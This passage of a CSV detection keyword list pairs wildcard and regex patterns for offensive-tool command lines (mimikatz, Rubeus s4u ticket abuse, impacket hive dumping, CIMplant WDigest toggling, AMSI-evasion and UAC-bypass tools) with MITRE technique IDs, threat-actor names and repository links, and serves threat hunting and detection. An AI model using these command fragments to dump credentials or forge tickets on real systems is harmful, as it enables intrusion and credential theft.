rusers.nse*",".{0,1000}\srusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rustbof *",".{0,1000}\srustbof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "* rusthound.exe*",".{0,1000}\srusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - 
TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* rwf.py *",".{0,1000}\srwf\.py\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "* -s * -c command_exec --execute *",".{0,1000}\s\-s\s.{0,1000}\s\-c\scommand_exec\s\-\-execute\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c disable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c disable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c enable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses 
either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c enable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c remote_posh *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sremote_posh\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * --method 1 --function shell_exec --parameters cmd:id*",".{0,1000}\s\-s\s.{0,1000}\s\-\-method\s1\s\-\-function\sshell_exec\s\-\-parameters\scmd\:id.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -s *ascii* -b *reverse*invoke-expression*",".{0,1000}\s\-s\s.{0,1000}ascii.{0,1000}\s\-b\s.{0,1000}reverse.{0,1000}invoke\-expression.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 
- T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -s 127.0.0.1 -e * -a connect -u ntlm*",".{0,1000}\s\-s\s127\.0\.0\.1\s\-e\s.{0,1000}\s\-a\sconnect\s\-u\sntlm.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* -s putty.exe_sig *",".{0,1000}\s\-s\sputty\.exe_sig\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*' s::l '*",".{0,1000}\'\ss\:\:l\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* s4u * /bronzebit*",".{0,1000}\ss4u\s.{0,1000}\s\/bronzebit.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u * /nopac*",".{0,1000}\ss4u\s.{0,1000}\s\/nopac.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u * /ticket:*",".{0,1000}\ss4u\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u *.kirbi*",".{0,1000}\ss4u\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s4u */rc4:* ",".{0,1000}\ss4u\s.{0,1000}\/rc4\:.{0,1000}\s","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* s7-info.nse*",".{0,1000}\ss7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -sam * -system * -security * LOCAL > *.out*",".{0,1000}\s\-sam\s.{0,1000}\s\-system\s.{0,1000}\s\-security\s.{0,1000}\sLOCAL\s\>\s.{0,1000}\.out.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* samba-vuln-cve-2012-1182.nse*",".{0,1000}\ssamba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -SauronEye -Command *",".{0,1000}\s\-SauronEye\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -save-old -dc-ip *",".{0,1000}\s\-save\-old\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -sc GetSyscallStub *",".{0,1000}\s\-sc\sGetSyscallStub\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -sc SysWhispers3*",".{0,1000}\s\-sc\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* scan * --dc-ip 
*",".{0,1000}\sscan\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* scan --github-org*",".{0,1000}\sscan\s\-\-github\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* scan --github-user*",".{0,1000}\sscan\s\-\-github\-user.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*",".{0,1000}\s\-Scan\s\-ScanType\s3\s\-File\s.{0,1000}\s\-DisableRemediation\s\-Trace\s\-Level\s0x10.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* --scan-local-shares * -e 
*",".{0,1000}\s\-\-scan\-local\-shares\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* Scanning Eventvwr registry! ..*",".{0,1000}\sScanning\sEventvwr\sregistry!\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "* -SCCMHost * -Outfile *",".{0,1000}\s\-SCCMHost\s.{0,1000}\s\-Outfile\s.{0,1000}","offensive_tool_keyword","CMLoot","Find 
interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "* -ScheduledTask -OnIdle *",".{0,1000}\s\-ScheduledTask\s\-OnIdle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* 
scmuacbypass.cpp*",".{0,1000}\sscmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* scmuacbypass.exe*",".{0,1000}\sscmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* --script dns-srv-enum *",".{0,1000}\s\-\-script\sdns\-srv\-enum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script http-ntlm-info *",".{0,1000}\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script smb-security-mode*smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-security\-mode.{0,1000}smb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --script smb-vuln-*",".{0,1000}\s\-\-script\ssmb\-vuln\-.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* --script=http-ntlm-info --script-args=http-ntlm-info.root=*",".{0,1000}\s\-\-script\=http\-ntlm\-info\s\-\-script\-args\=http\-ntlm\-info\.root\=.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "* --script=ldap-search -p *",".{0,1000}\s\-\-script\=ldap\-search\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script=realvnc-auth-bypass *",".{0,1000}\s\-\-script\=realvnc\-auth\-bypass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --script-args dns-srv-enum.domain=*",".{0,1000}\s\-\-script\-args\sdns\-srv\-enum\.domain\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -ScriptString * -GetMinimallyObfuscated*",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-GetMinimallyObfuscated.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -ScriptString * -PSAmsiScanner *",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-PSAmsiScanner\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -seatbelt -Command 
